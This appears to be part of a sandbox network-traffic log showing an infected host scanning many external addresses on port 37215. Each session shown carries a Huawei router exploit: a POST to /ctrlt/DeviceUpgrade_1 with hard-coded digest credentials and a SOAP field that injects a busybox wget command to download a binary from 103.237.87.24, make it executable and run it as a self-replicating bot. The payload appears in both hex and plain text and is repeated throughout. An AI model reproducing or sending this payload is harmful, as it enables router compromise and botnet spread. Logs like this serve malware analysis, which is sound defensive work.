20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1757192.168.2.1333622197.246.82.7137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.537331104 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1758192.168.2.1359878147.9.217.13237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.537343025 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1759192.168.2.133427441.207.153.15937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.537441969 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1760192.168.2.1336240197.140.136.20037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.537538052 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1761192.168.2.1335590197.36.58.15637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.537559032 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1762192.168.2.135892212.74.233.8237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.537559032 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1763192.168.2.1346884197.186.228.10837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.537626028 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1764192.168.2.134161641.210.211.3037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.537632942 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1765192.168.2.1345736157.16.67.7537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.537641048 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1766192.168.2.135122841.99.131.20937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.537645102 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1767192.168.2.1340638197.188.122.6737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.537647009 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
